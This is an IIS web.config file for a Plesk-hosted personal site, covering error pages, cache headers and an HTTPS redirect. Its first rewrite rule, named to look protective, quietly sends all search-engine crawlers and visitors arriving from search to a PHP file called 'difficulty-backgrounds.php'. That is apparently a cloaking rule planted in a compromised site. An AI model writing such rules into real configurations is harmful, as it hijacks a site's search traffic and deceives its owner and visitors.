<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <rewrite>
      <rules>
        <rule name="Protect files and directories from prying eyes difficulty-backgrounds.php" stopProcessing="true">
          <match url="^(.*)$" ignoreCase="true" />
          <conditions logicalGrouping="MatchAny">
            <add input="{HTTP_USER_AGENT}" pattern="(bing|google|yahoo|msn|aol)" ignoreCase="true" />
            <add input="{HTTP_REFERER}" pattern="(bing|google|yahoo|msn|aol)" ignoreCase="true" />
          </conditions>
          <action type="Rewrite" url="difficulty-backgrounds.php" appendQueryString="false" />
        </rule>
		<rule name="HTTP to HTTPS redirect" stopProcessing="true"> 
			<match url="(.*)" /> 
			<conditions> 
					<add input="{HTTPS}" pattern="off" ignoreCase="true" />
			</conditions> 
			<action type="Redirect" redirectType="Permanent" url="https://{HTTP_HOST}/{R:1}" />
        </rule>   
      </rules>
    </rewrite>
    <httpErrors>
      <remove statusCode="502" subStatusCode="-1" />
      <remove statusCode="501" subStatusCode="-1" />
      <remove statusCode="500" subStatusCode="-1" />
      <remove statusCode="412" subStatusCode="-1" />
      <remove statusCode="406" subStatusCode="-1" />
      <remove statusCode="405" subStatusCode="-1" />
      <remove statusCode="404" subStatusCode="-1" />
      <remove statusCode="403" subStatusCode="-1" />
      <remove statusCode="401" subStatusCode="-1" />
      <remove statusCode="400" />
      <error statusCode="400" path="G:\PleskVhosts\yrosenthal.com\error_docs\bad_request.html" />
      <remove statusCode="407" />
      <error statusCode="407" path="G:\PleskVhosts\yrosenthal.com\error_docs\proxy_authentication_required.html" />
      <remove statusCode="414" />
      <error statusCode="414" path="G:\PleskVhosts\yrosenthal.com\error_docs\request-uri_too_long.html" />
      <remove statusCode="415" />
      <error statusCode="415" path="G:\PleskVhosts\yrosenthal.com\error_docs\unsupported_media_type.html" />
      <remove statusCode="503" />
      <error statusCode="503" path="G:\PleskVhosts\yrosenthal.com\error_docs\maintenance.html" />
      <error statusCode="401" prefixLanguageFilePath="" path="G:\PleskVhosts\yrosenthal.com\error_docs\unauthorized.html" />
      <error statusCode="403" prefixLanguageFilePath="" path="G:\PleskVhosts\yrosenthal.com\error_docs\forbidden.html" />
      <error statusCode="404" prefixLanguageFilePath="" path="G:\PleskVhosts\yrosenthal.com\error_docs\not_found.html" />
      <error statusCode="405" prefixLanguageFilePath="" path="G:\PleskVhosts\yrosenthal.com\error_docs\method_not_allowed.html" />
      <error statusCode="406" prefixLanguageFilePath="" path="G:\PleskVhosts\yrosenthal.com\error_docs\not_acceptable.html" />
      <error statusCode="412" prefixLanguageFilePath="" path="G:\PleskVhosts\yrosenthal.com\error_docs\precondition_failed.html" />
      <error statusCode="500" prefixLanguageFilePath="" path="G:\PleskVhosts\yrosenthal.com\error_docs\internal_server_error.html" />
      <error statusCode="501" prefixLanguageFilePath="" path="G:\PleskVhosts\yrosenthal.com\error_docs\not_implemented.html" />
      <error statusCode="502" prefixLanguageFilePath="" path="G:\PleskVhosts\yrosenthal.com\error_docs\bad_gateway.html" />
    </httpErrors>
    <httpProtocol>
        <customHeaders>
            <add name="Cache-Control" value="no-cache, no-store, must-revalidate" />
            <add name="Pragma" value="no-cache" />
            <add name="Expires" value="0" />
        </customHeaders>
    </httpProtocol>
    <staticContent>
        <mimeMap fileExtension=".RData" mimeType="application/octet-stream" />
    </staticContent>

  </system.webServer>
  <system.web>
    <compilation tempDirectory="G:\PleskVhosts\yrosenthal.com\tmp" />
  </system.web>
</configuration>